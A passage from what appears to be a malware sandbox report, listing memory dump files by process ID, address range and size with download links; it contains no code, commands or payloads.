2.0MB

Download
memory/4976-354-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-200-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-359-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-196-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-195-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-192-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-187-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-162-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/4976-183-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-182-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-179-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-178-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-175-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-172-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-167-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-165-0x00007FF84D930000-0x00007FF84DAD1000-memory.dmp

Filesize
1.6MB

Download
memory/4976-379-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-164-0x00007FF84CE50000-0x00007FF84CF0E000-memory.dmp

Filesize
760KB

Download
memory/4976-163-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4992-232-0x0000000000000000-mapping.dmp

Download
memory/5004-364-0x0000000000000000-mapping.dmp

Download
memory/5040-253-0x0000000000000000-mapping.dmp

Download
memory/5128-397-0x0000000000000000-mapping.dmp

Download
memory/5352-406-0x0000000000000000-mapping.dmp

Download
memory/5884-484-0x0000000000000000-mapping.dmp

Download